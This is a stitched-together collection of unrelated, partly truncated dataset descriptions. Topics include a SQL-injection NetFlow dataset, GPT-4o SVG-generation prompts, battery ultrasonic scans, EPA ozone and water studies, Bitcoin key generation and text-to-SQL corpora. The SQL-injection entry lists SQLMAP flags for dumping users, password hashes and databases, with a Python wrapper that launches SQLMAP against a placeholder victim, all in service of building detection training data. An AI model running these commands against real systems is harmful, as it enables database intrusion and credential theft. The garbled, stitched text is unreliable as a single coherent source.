Dataset Card for example-preference-dataset
This dataset has been created with distilabel.
Dataset Summary
This dataset contains a pipeline.yaml which can be used to reproduce the pipeline that generated it in distilabel using the distilabel CLI: distilabel pipeline run --config "https://huggingface.co/datasets/sdiazlor/example-preference-dataset/raw/main/pipeline.yaml"
or explore the configuration: distilabel pipeline info --config… See the full description on the dataset page: https://huggingface.co/datasets/distilabel-internal-testing/example-generate-preference-dataset.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are SQL injection with Union queries and Blind SQL injection. The attacks were performed using the SQLMAP tool.
The NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset was collected to train the detection models (D1), and the other was collected using different attacks than those used in training, in order to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset | Aim      | Samples | Benign-malicious traffic ratio
D1      | Training | 400,003 | 50%
D2      | Test     | 57,239  | 50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or after it has been active for 1,800 seconds (30 minutes).
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks: on the one hand, it routes packets to the Internet; on the other hand, it forwards the traffic to a NetFlow data generation node (packets received from the Internet are handled in the same way).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration testing tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed from 16 nodes, each launching SQLMAP with the parameters listed in the following table.
Parameters | Description
--banner, --current-user, --current-db, --hostname, --is-dba, --users, --passwords, --privileges, --roles, --dbs, --tables, --columns, --schema, --count, --dump, --comments | Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5 | Increase the probability of a false positive identification
--risk=3 | Increase the probability of extracting data
--random-agent | Select the User-Agent randomly
--batch | Never ask for user input; use the default behaviour
--answers="follow=Y" | Predefined answers to yes
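For illustration, a minimal sketch of how an attack node could invoke SQLMAP with these parameters is shown below. The wrapper script, target URL, and output handling are hypothetical and are not part of the dataset or of DOROTHEA itself.

```python
# Hypothetical sketch: launch SQLMAP with the flags from the table above.
# The target URL is an illustrative placeholder, not a value from the dataset.
import subprocess

ENUMERATION_FLAGS = [
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles", "--dbs",
    "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
]

def run_sqlmap(target_url: str) -> None:
    cmd = [
        "sqlmap", "-u", target_url,
        "--level=5",            # widen the set of tests performed
        "--risk=3",             # allow more aggressive payloads
        "--random-agent",       # randomize the User-Agent header
        "--batch",              # never prompt; take default answers
        "--answers=follow=Y",   # pre-answer redirect prompts with "yes"
        *ENUMERATION_FLAGS,
    ]
    subprocess.run(cmd, check=False)

if __name__ == "__main__":
    run_sqlmap("http://192.0.2.10/vulnerable_form.php?id=1")  # placeholder victim node
```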
Every node executed SQLIA against 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, which was connected to either the MySQL or the SQL Server database engine (50% of the victim nodes deployed MySQL and the other 50% deployed SQL Server).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, Blind SQL injection attacks were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes.
The MySQL server was run using MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used for the other engines.
Apache License, v2.0: https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
This training data was generated using GPT-4o as part of the 'Drawing with LLM' competition (https://www.kaggle.com/competitions/drawing-with-llms). It can be used to fine-tune small language models for the competition or serve as an augmentation dataset alongside other data sources.
The dataset is generated in two steps using the GPT-4o model. In the first step, topic descriptions relevant to the competition are generated using a specific prompt; by running this prompt multiple times, over 3,000 descriptions were collected.
prompt=f""" I am participating in an SVG code generation competition.
The competition involves generating SVG images based on short textual descriptions of everyday objects and scenes, spanning a wide range of categories. The key guidelines are as follows:
- Descriptions are generic and do not contain brand names, trademarks, or personal names.
- No descriptions include people, even in generic terms.
- Descriptions are concise—each is no more than 200 characters, with an average length of about 50 characters.
- Categories cover various domains, with some overlap between public and private test sets.
To train a small LLM model, I am preparing a synthetic dataset. Could you generate 100 unique topics aligned with the competition style?
Requirements:
- Each topic should range between **20 and 200 characters**, with an **average around 60 characters**.
- Ensure **diversity and creativity** across topics.
- **50% of the topics** should come from the categories of **landscapes**, **abstract art**, and **fashion**.
- Avoid duplication or overly similar phrasing.
Example topics:
a purple forest at dusk, gray wool coat with a faux fur collar, a lighthouse overlooking the ocean, burgundy corduroy, pants with patch pockets and silver buttons, orange corduroy overalls, a purple silk scarf with tassel trim, a green lagoon under a cloudy sky, crimson rectangles forming a chaotic grid, purple pyramids spiraling around a bronze cone, magenta trapezoids layered on a translucent silver sheet, a snowy plain, black and white checkered pants, a starlit night over snow-covered peaks, khaki triangles and azure crescents, a maroon dodecahedron interwoven with teal threads.
Please return the 100 topics in csv format.
"""
In the second step, GPT-4o generates SVG code for each collected description using the following prompt.
prompt = f"""
Generate SVG code to visually represent the following text description, while respecting the given constraints.
Allowed Elements: `svg`, `path`, `circle`, `rect`, `ellipse`, `line`, `polyline`, `polygon`, `g`, `linearGradient`, `radialGradient`, `stop`, `defs`
Allowed Attributes: `viewBox`, `width`, `height`, `fill`, `stroke`, `stroke-width`, `d`, `cx`, `cy`, `r`, `x`, `y`, `rx`, `ry`, `x1`, `y1`, `x2`, `y2`, `points`, `transform`, `opacity`
Please ensure that the generated SVG code is well-formed, valid, and strictly adheres to these constraints.
Focus on a clear and concise representation of the input description within the given limitations.
Always give the complete SVG code with nothing omitted. Never use an ellipsis.
The code is scored based on similarity to the description, visual question answering, and aesthetic components.
Please generate a detailed svg code accordingly.
input description: {text}
"""
The raw SVG output is then cleaned and sanitized using a competition-specific sanitization class. After that, the cleaned SVG is scored using the SigLIP model to evaluate text-to-SVG similarity. Only SVGs with a score above 0.5 are included in the dataset. On average, out of three SVG generations, only one meets the quality threshold after the cleaning, sanitization, and scoring process.
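A minimal sketch of what such a filtering step could look like is shown below, assuming the competition-specific sanitizer is applied elsewhere. The SigLIP checkpoint, rendering helper, and function names are illustrative assumptions, not the exact components used to build the dataset; only the 0.5 threshold comes from the description above.

```python
# Hypothetical filtering sketch: render an SVG, score it against its text
# description with a SigLIP checkpoint, and keep it only above a threshold.
import io
import cairosvg                      # renders SVG to PNG bytes
import torch
from PIL import Image
from transformers import AutoProcessor, AutoModel

MODEL_ID = "google/siglip-base-patch16-224"   # illustrative checkpoint choice
processor = AutoProcessor.from_pretrained(MODEL_ID)
model = AutoModel.from_pretrained(MODEL_ID)

def text_svg_similarity(description: str, svg_code: str) -> float:
    png_bytes = cairosvg.svg2png(bytestring=svg_code.encode("utf-8"))
    image = Image.open(io.BytesIO(png_bytes)).convert("RGB")
    inputs = processor(text=[description], images=image,
                       padding="max_length", return_tensors="pt")
    with torch.no_grad():
        outputs = model(**inputs)
    # SigLIP scores image-text pairs with a sigmoid over the pairwise logits.
    return torch.sigmoid(outputs.logits_per_image)[0, 0].item()

svg = '<svg viewBox="0 0 100 100"><circle cx="50" cy="50" r="40" fill="purple"/></svg>'
if text_svg_similarity("a purple circle", svg) > 0.5:   # threshold from the card
    print("keep sample")
```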
A dataset with ~50,000 samples for SVG code generation is publicly available at: https://huggingface.co/datasets/vinoku89/svg-code-generation
CC0 1.0 Universal Public Domain Dedication: https://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
The item published is a dataset that provides the raw data and original code to generate Figure 4 in the research paper, Correlative non-destructive techniques to investigate ageing and orientation effects in automotive Li-ion pouch cells, https://doi.org/10.5522/04/c.6868027 of which I am first author. The measurements and following data analysis took place between January 2022 – November 2022.
The figure illustrates the ultrasonic mapping measurements of pouch cells that have been extracted from electric vehicles and have been aged in real-world conditions. The degradation of the cells was measured using four different complementary characterisation measurement techniques, one of which was ultrasonic mapping.
The ultrasonic mapping measurements were performed using an Olympus Focus PX phased-array instrument (Olympus Corp., Japan) with a 5 MHz 1D linear phased array probe consisting of 64 transducers. The transducer had an active aperture of 64 mm with an element pitch (centre-to-centre distance between elements) of 1 mm. The cell was covered with ultrasonic couplant (Fannin UK Ltd.) prior to every scan to ensure good acoustic transmission. The transducer was moved along the length of each cell at a fixed pressure using an Olympus GLIDER 2-axis encoded scanner with the step size set at 1 mm to give a resolution of ca. 1 mm². Due to the large size of the cells, the active aperture of the probe was wide enough to cover one third of the cell width, meaning that three measurements were taken for each cell and the data were combined to form the colour maps.
Data from the ultrasonic signals were analysed using FocusPC software. The waveforms recorded by the transducer were exported and plotted using custom Python code to compare how the signal changes at different points in the cell. For consistency, a specific ToF range was selected for all cells, chosen because it is where the part of the waveform known as the ‘echo-peak’ is located. The echo-peak is useful to monitor because it corresponds to the waveform that has travelled the whole way through the cell and reflected from the back surface, thereby characterising the entire cell. The maximum amplitude of the ultrasonic signal within this ToF range at each point is combined to produce a colour map. The signal amplitude is expressed as a percentage of 100, where 100 is the maximum intensity of the signal, meaning that the signal has been attenuated the least as it travels through the cell, and 0 is the minimum intensity. The intensity is absolute and not normalised across all scans, meaning that amplitude values on different cells can be directly compared.
The Pristine cell is a second-generation Nissan Leaf pouch, different to the first-generation aged cells of varying orientation. The authors were not able to acquire an identical first-generation pristine Nissan Leaf cell. Nonetheless, it was expected that the Pristine cell would contain a uniform internal structure regardless of the specific chemistry, and that this would be identified in an ultrasound map consisting of a single colour (or narrow colour range).
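For readers who want a concrete picture of the colour-map construction described above, here is a minimal sketch: for each scan position, take the maximum signal amplitude inside a fixed ToF window and plot the resulting grid. The array shape, ToF window, and file names are illustrative assumptions, not values from the published dataset or its original code.

```python
# Hypothetical sketch of building an ultrasonic amplitude colour map.
import numpy as np
import matplotlib.pyplot as plt

# waveforms[y, x, t]: amplitude (0-100 %) at each scan position and time sample
waveforms = np.load("cell_waveforms.npy")          # placeholder input file
tof_window = slice(400, 520)                       # illustrative echo-peak ToF range

# Maximum amplitude within the ToF window at each scan point
amplitude_map = waveforms[:, :, tof_window].max(axis=2)

plt.imshow(amplitude_map, cmap="viridis", vmin=0, vmax=100, origin="lower")
plt.colorbar(label="Max echo-peak amplitude (%)")
plt.xlabel("Position along cell length (mm)")
plt.ylabel("Position across cell width (mm)")
plt.title("Ultrasonic amplitude map (illustrative)")
plt.savefig("amplitude_map.png", dpi=200)
```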
Data sets used to prepare illustrative figures for the overview article “Multiscale Modeling of Background Ozone”.

Overview
The CMAQ model output datasets used to create illustrative figures for this overview article were generated by scientists in EPA/ORD/CEMM and EPA/OAR/OAQPS. The EPA/ORD/CEMM-generated dataset consisted of hourly CMAQ output from two simulations. The first simulation was performed for July 1 – 31 over a 12 km modeling domain covering the Western U.S. The simulation was configured with the Integrated Source Apportionment Method (ISAM) to estimate the contributions from 9 source categories to modeled ozone. ISAM source contributions for July 17 – 31 averaged over all grid cells located in Colorado were used to generate the illustrative pie chart in the overview article. The second simulation was performed for October 1, 2013 – August 31, 2014 over a 108 km modeling domain covering the northern hemisphere. This simulation was also configured with ISAM to estimate the contributions from non-US anthropogenic sources, natural sources, stratospheric ozone, and other sources on ozone concentrations. Ozone ISAM results from this simulation were extracted along a boundary curtain of the 12 km modeling domain specified over the Western U.S. for the time period January 1, 2014 – July 31, 2014 and used to generate the illustrative time-height cross-sections in the overview article. The EPA/OAR/OAQPS-generated dataset consisted of hourly gridded CMAQ output for surface ozone concentrations for the year 2016. The CMAQ simulations were performed over the northern hemisphere at a horizontal resolution of 108 km. NO2 and O3 data for July 2016 were extracted from these simulations to generate the vertically-integrated column densities shown in the illustrative comparison to satellite-derived column densities.

CMAQ Model Data
The data from the CMAQ model simulations used in this research effort are very large (several terabytes) and cannot be uploaded to ScienceHub due to size restrictions. The model simulations are stored on the /asm archival system accessible through the atmos high-performance computing (HPC) system. Due to data management policies, files on /asm are subject to expiry depending on the template of the project. Files not requested for extension after the expiry date are deleted permanently from the system. The format of the files used in this analysis and listed below is ioapi/netcdf. Documentation of this format, including definitions of the geographical projection attributes contained in the file headers, is available at https://www.cmascenter.org/ioapi/. Documentation on the CMAQ model, including a description of the output file format and output model species, can be found in the CMAQ documentation on the CMAQ GitHub site at https://github.com/USEPA/CMAQ.

This dataset is associated with the following publication: Hogrefe, C., B. Henderson, G. Tonnesen, R. Mathur, and R. Matichuk. Multiscale Modeling of Background Ozone: Research Needs to Inform and Improve Air Quality Management. EM Magazine. Air and Waste Management Association, Pittsburgh, PA, USA, 1-6, (2020).
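As a brief illustration of working with ioapi/netcdf output of this kind, the sketch below opens a CMAQ concentration file with the netCDF4 library and extracts a surface-layer ozone field. The file name is a placeholder (the actual model output resides only on EPA systems), and the variable layout shown follows the usual IOAPI convention rather than the specific files described here.

```python
# Hypothetical sketch of reading an IOAPI/netCDF CMAQ output file.
import numpy as np
from netCDF4 import Dataset

with Dataset("CCTM_CONC_2016_example.nc") as nc:           # placeholder file name
    # IOAPI files typically store species as (TSTEP, LAY, ROW, COL) arrays.
    o3 = nc.variables["O3"][:]                              # ozone mixing ratio (often ppmV)
    surface_o3_ppb = np.asarray(o3[:, 0, :, :]) * 1000.0    # layer 1, converted to ppb

print("hours:", surface_o3_ppb.shape[0],
      "grid:", surface_o3_ppb.shape[1:],
      "max surface O3 (ppb): %.1f" % surface_o3_ppb.max())
```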
The data set was used to produce tables and figures in the paper. This dataset is associated with the following publications: Lytle, D., S. Pfaller, C. Muhlen, I. Struewing, S. Triantafyllidou, C. White, S. Hayes, D. King, and J. Lu. A Comprehensive Evaluation of Monochloramine Disinfection on Water Quality, Legionella and Other Important Microorganisms in a Hospital. WATER RESEARCH. Elsevier Science Ltd, New York, NY, USA, 189: 116656, (2021). Lytle, D., C. Formal, K. Cahalan, C. Muhlen, and S. Triantafyllidou. The Impact of Sampling Approach and Daily Water Usage on Lead Levels Measured at the Tap. WATER RESEARCH. Elsevier Science Ltd, New York, NY, USA, 197: 117071, (2021).
Unique ID of the registered user
How many days the user was active on the platform in the last 7 days.
Number of Products viewed by the user in the last 15 days
Vintage (In Days) of the user as of today
Most frequently viewed (by page loads) product by the user in the last 15 days. If multiple products have a similar number of page loads, consider the most recent one. If the user has not viewed any product in the last 15 days, set it to Product101.
Most frequently used OS by the user.
Most recently viewed (by page loads) product by the user. If the user has not viewed any product, set it to Product101.
Count of Page loads in the last 7 days by the user
Count of Clicks in the last 7 days by the user
The dataset contains the data used to produce a figure in the manuscript. This dataset is associated with the following publication: Tang, M., D. Lytle, and J. Botkins. Accumulation and Release of Arsenic from Cast Iron: Impact of Initial Arsenic and Orthophosphate Concentrations. WATER RESEARCH. Elsevier Science Ltd, New York, NY, USA, 194: 116942, (2021).
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Keys are the core element in constructing the Bitcoin trust network. A key pair consists of a private key and a public key: the private key is used to generate signatures, and the public key is used to generate addresses. Bitcoin keys are generated with the elliptic curve algorithm secp256k1. This data set contains the core code to generate such keys.
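For orientation, a minimal sketch of secp256k1 key-pair generation is given below. This is not the dataset's own code; the library choice (ecdsa) and variable names are illustrative, and address encoding (version byte plus Base58Check) is omitted.

```python
# Hypothetical sketch: generate a secp256k1 key pair and hash the public key
# toward a Bitcoin address.
import hashlib
from ecdsa import SigningKey, SECP256k1   # pip install ecdsa

private_key = SigningKey.generate(curve=SECP256k1)      # signing key
public_key = private_key.get_verifying_key()            # verification key

# Uncompressed SEC format: 0x04 || X || Y
pub_bytes = b"\x04" + public_key.to_string()

# HASH160 = RIPEMD-160(SHA-256(pubkey)); Bitcoin addresses are derived from this
# digest. Note: "ripemd160" requires OpenSSL support in your Python build.
hash160 = hashlib.new("ripemd160", hashlib.sha256(pub_bytes).digest()).digest()

print("private key:", private_key.to_string().hex())
print("public key: ", pub_bytes.hex())
print("hash160:    ", hash160.hex())
```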
Attribution-ShareAlike 3.0 (CC BY-SA 3.0): https://creativecommons.org/licenses/by-sa/3.0/
License information was derived automatically
sql-create-context-v2 Dataset
Overview
The sql-create-context-v2 dataset enhances the original dataset built from WikiSQL and Spider, focusing on text-to-SQL tasks with a special emphasis on reducing hallucination of column and table names. This version introduces a JSONL format for more efficient data processing and iteration, alongside a structured approach to representing SQL queries in the dataset entries.
Key Enhancements
Dataset Format: Transitioned to… See the full description on the dataset page: https://huggingface.co/datasets/ramachetan22/sql-create-context-v2.
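A quick usage sketch follows, assuming the data can be loaded directly from the Hugging Face Hub. The column names mentioned in the comment (question, context, answer) are an assumption based on the original sql-create-context schema and are not confirmed here.

```python
# Hypothetical usage sketch: load the dataset and inspect one record.
from datasets import load_dataset

ds = load_dataset("ramachetan22/sql-create-context-v2", split="train")
example = ds[0]
print(example)   # expected: natural-language question, CREATE TABLE context, target SQL
```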
The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly. While it was estimated at ***** zettabytes in 2025, the forecast for 2029 stands at ***** zettabytes. Thus, global data generation will triple between 2025 and 2029. Data creation has been expanding continuously over the past decade. In 2020, the growth was higher than previously expected, caused by the increased demand due to the coronavirus (COVID-19) pandemic, as more people worked and learned from home and used home entertainment options more often.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Performance evaluation based on AUC for pairs with counts > 1.
Pollinator habitat can be planted on farms to enhance floral and nesting resources, and subsequently, pollinator populations. There is ample evidence linking such plantings to greater pollinator abundance on farms, but less is known about their effects on pollinator reproduction. We placed Bombus impatiens Cresson (Hymenoptera: Apidae) and Megachile rotundata (F.) (Hymenoptera: Megachilidae) nests out on 19 Mid-Atlantic farms in 2018, where half (n=10) the farms had established wildflower plantings and half (n=9) did not. Bombus impatiens nests were placed at each farm in spring and mid-summer and repeatedly weighed to capture colony growth. We quantified the relative production of reproductive castes and assessed parasitism rates by screening for conopid fly parasitism and Nosema spores within female workers. We also released M. rotundata cocoons at each farm in spring and collected new nests and emergent adult offspring over the next year, recording female weight as an indicator of reproductive potential and quantifying Nosema parasitism and parasitoid infection rates. Bombus impatiens nests gained less weight and contained female workers with Nosema spore loads over 150x greater on farms with wildflower plantings. In contrast, M. rotundata female offspring weighed more on farms with wildflower plantings and marginally less on farms with honey bee hives. We conclude that wildflower plantings likely enhance reproduction in some species, but that they could also enhance microsporidian parasitism rates in susceptible bee species. It will be important to determine how wildflower planting benefits can be harnessed while minimizing parasitism in wild and managed bee species.
https://dataverse.harvard.edu/api/datasets/:persistentId/versions/2.2/customlicense?persistentId=doi:10.7910/DVN/SG3LP1
This archive contains code and data for reproducing the analysis for “Replication Data for Revisiting ‘The Rise and Decline’ in a Population of Peer Production Projects”. Depending on what you hope to do with the data, you probably do not want to download all of the files; depending on your computation resources, you may not be able to run all stages of the analysis. The code for all stages of the analysis, including typesetting the manuscript and running the analysis, is in code.tar. If you only want to run the final analysis or to play with datasets used in the analysis of the paper, you want intermediate_data.7z or the uncompressed tab and csv files.

The data files are created in a four-stage process. The first stage uses the program “wikiq” to parse MediaWiki XML dumps and create tsv files that have edit data for each wiki. The second stage generates the all.edits.RDS file, which combines these tsvs into a dataset of edits from all the wikis; this file is expensive to generate and, at 1.5 GB, is pretty big. The third stage builds smaller intermediate files that contain the analytical variables from these tsv files. The fourth stage uses the intermediate files to generate smaller RDS files that contain the results. Finally, knitr and LaTeX typeset the manuscript. A stage will only run if the outputs from the previous stages do not exist, so if the intermediate files exist they will not be regenerated and only the final analysis will run. The exception is that stage 4, fitting models and generating plots, always runs. If you only want to replicate from the second stage onward, you want wikiq_tsvs.7z. If you want to replicate everything, you want wikia_mediawiki_xml_dumps.7z.001, wikia_mediawiki_xml_dumps.7z.002, and wikia_mediawiki_xml_dumps.7z.003. These instructions work backwards from building the manuscript using knitr, loading the datasets, running the analysis, to building the intermediate datasets.

Building the manuscript using knitr
This requires working latex, latexmk, and knitr installations. Depending on your operating system you might install these packages in different ways; on Debian Linux you can run apt install r-cran-knitr latexmk texlive-latex-extra. Alternatively, you can upload the necessary files to a project on Overleaf.com. Download code.tar, which has everything you need to typeset the manuscript, and unpack the tar archive (on a unix system, tar xf code.tar). Navigate to code/paper_source. Install R dependencies: in R, run install.packages(c("data.table","scales","ggplot2","lubridate","texreg")). On a unix system you should then be able to run make to build the manuscript generalizable_wiki.pdf. Otherwise you should try uploading all of the files (including the tables, figure, and knitr folders) to a new project on Overleaf.com.

Loading intermediate datasets
The intermediate datasets are found in the intermediate_data.7z archive. They can be extracted on a unix system using the command 7z x intermediate_data.7z; the files are 95 MB uncompressed. These are RDS (R data set) files and can be loaded in R using readRDS, for example newcomer.ds <- readRDS("newcomers.RDS"). If you wish to work with these datasets using a tool other than R, you might prefer to work with the .tab files.

Running the analysis
Fitting the models may not work on machines with less than 32 GB of RAM. If you have trouble, you may find the functions in lib-01-sample-datasets.R useful to create stratified samples of data for fitting models; see line 89 of 02_model_newcomer_survival.R for an example. Download code.tar and intermediate_data.7z to your working folder and extract both archives (on a unix system, tar xf code.tar && 7z x intermediate_data.7z). Install R dependencies: install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). On a unix system you can simply run regen.all.sh to fit the models, build the plots and create the RDS files.

Generating datasets
Building the intermediate files: the intermediate files are generated from all.edits.RDS, and this process requires about 20 GB of memory. Download all.edits.RDS, userroles_data.7z, selected.wikis.csv, and code.tar. Unpack code.tar and userroles_data.7z (on a unix system, tar xf code.tar && 7z x userroles_data.7z). Install R dependencies: in R run install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). Run 01_build_datasets.R.

Building all.edits.RDS: the intermediate RDS files used in the analysis are created from all.edits.RDS. To replicate building all.edits.RDS, you only need to run 01_build_datasets.R when the intermediate RDS files and all.edits.RDS files do not exist in the working directory. all.edits.RDS is generated from the tsv files generated by wikiq. This may take several hours. By default building the dataset will...
Excel spreadsheet of raw data used to generate Fig 2F.
U.S. Government Works: https://www.usa.gov/government-works
License information was derived automatically
The product data are six statistics that were estimated for the chemical concentration of lithium in the soil C horizon of the conterminous United States. The estimates are made at 9998 locations that are uniformly distributed across the conterminous United States. The six statistics are the mean for the isometric log-ratio transform of the concentrations, the equivalent mean for the concentrations, the standard deviation for the isometric log-ratio transform of the concentrations, the probability of exceeding a concentration of 55 milligrams per kilogram, the 0.95 quantile for the isometric log-ratio transform of the concentrations, and the equivalent 0.95 quantile for the concentrations. Each statistic may be used to generate a statistical map that shows an attribute of the distribution of lithium concentration.
Companies and individuals are storing increasingly more data digitally; however, much of the data is unused because it is unclassified. How many times have you opened your downloads folder, found a file you downloaded a year ago and you have no idea what the contents are? You can read through those files individually but imagine doing that for thousands of files. All that raw data in storage facilities create data lakes. As the amount of data grows and the complexity rises, data lakes become data swamps. The potentially valuable and interesting datasets will likely remain unused. Our tool addresses the need to classify these large pools of data in a visually effective and succinct manner by identifying keywords in datasets, and classifying datasets into a consistent taxonomy.
The files listed within kaggleDatasetSummaryTopicsClassification.csv have been processed with our tool to generate the keywords and taxonomic classification as seen below. The summaries are not generated from our system. Instead they were retrieved from user input as they uploaded the files on Kaggle. We planned to utilize these summaries to create an NLG model to generate summaries from any input file. Unfortunately we were not able to collect enough data to build a good model. Hopefully the data within this set might help future users achieve that goal.
Developed with the Senior Design Center at NC State in collaboration with SAS. Senior Design Team: Tanya Chu, Katherine Marsh, Nikhil Milind, Anna Owens. SAS Representatives: Nancy Rausch, Marty Warner, Brant Kay, Tyler Wendell, JP Trawinski.
Polygon shapefile showing the footprint boundaries, source agency origins, and resolutions of compiled bathymetric digital elevation models (DEMs) used to construct a continuous, high-resolution DEM of the southern portion of San Francisco Bay.
https://dataintelo.com/privacy-and-policy
According to our latest research, the global synthetic data generation for security testing market size reached USD 1.03 billion in 2024, reflecting robust growth driven by the rising need for enhanced cybersecurity and data privacy across industries. The market is projected to grow at a CAGR of 27.6% during the forecast period, reaching an estimated USD 8.56 billion by 2033. This expansion is primarily fueled by the increasing sophistication of cyber threats, stringent regulatory requirements, and the growing adoption of artificial intelligence and machine learning in security operations.
One of the most significant growth factors for the synthetic data generation for security testing market is the escalating complexity and frequency of cyberattacks targeting organizations worldwide. As cybercriminals continuously evolve their tactics, traditional security testing methods often fall short in identifying advanced threats. Synthetic data generation enables organizations to simulate a diverse range of attack scenarios without exposing real sensitive information, thereby enhancing the effectiveness of penetration testing, vulnerability assessment, and compliance testing. The ability to generate high-quality, representative data sets that mimic real-world conditions is empowering security teams to proactively identify and remediate vulnerabilities, ensuring robust protection of digital assets. Furthermore, the adoption of synthetic data is reducing the risk of data breaches during testing, which is particularly critical for highly regulated sectors such as BFSI and healthcare.
Another key driver propelling the market is the increasing regulatory scrutiny and emphasis on data privacy. Regulations such as GDPR in Europe, CCPA in California, and similar frameworks across the globe mandate strict controls over the use and sharing of personally identifiable information (PII). Synthetic data generation offers a compliant alternative by creating non-identifiable, artificial data sets for testing purposes, thereby minimizing the risk of non-compliance and hefty penalties. Organizations are leveraging synthetic data to ensure that their security testing processes adhere to legal requirements while still maintaining the integrity and realism needed for effective threat simulation. The convergence of data privacy and cybersecurity imperatives is expected to sustain high demand for synthetic data solutions in the coming years.
The rapid digital transformation across industries is also contributing to market growth. As enterprises accelerate their adoption of cloud computing, IoT, and AI-driven technologies, their attack surfaces are expanding, necessitating more rigorous and scalable security testing practices. Synthetic data generation tools are increasingly being integrated into DevSecOps pipelines, enabling continuous security validation throughout the software development lifecycle. This integration not only enhances security posture but also supports agile development by eliminating dependencies on real production data. The scalability, flexibility, and automation capabilities offered by modern synthetic data generation platforms are making them indispensable for organizations seeking to stay ahead of emerging cyber threats.
From a regional perspective, North America currently dominates the synthetic data generation for security testing market, accounting for the largest revenue share in 2024. This leadership is attributed to the presence of major technology companies, a mature cybersecurity ecosystem, and early adoption of advanced security testing methodologies. Europe follows closely, driven by stringent data protection regulations and a strong focus on privacy-preserving technologies. The Asia Pacific region is witnessing the fastest growth, fueled by rapid digitalization, increasing cyber threats, and growing regulatory awareness. Latin America and the Middle East & Africa are also emerging as promising markets, with organizations in these regions ramping up investments in cybersecurity infrastructure to address evolving threat landscapes.
The component segment of the synthetic data generation for security testing market is bifurcated into software and services. Software solutions represent the core of this market, providing organizations with the tools necessary to generate, manipulate, and manage synthetic data sets tailored f
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset builds from sql-create-context.

@misc{b-mc2_2023_sql-create-context,
  title  = {sql-create-context Dataset},
  author = {b-mc2},
  year   = {2023},
  url    = {https://huggingface.co/datasets/b-mc2/sql-create-context},
  note   = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.},
}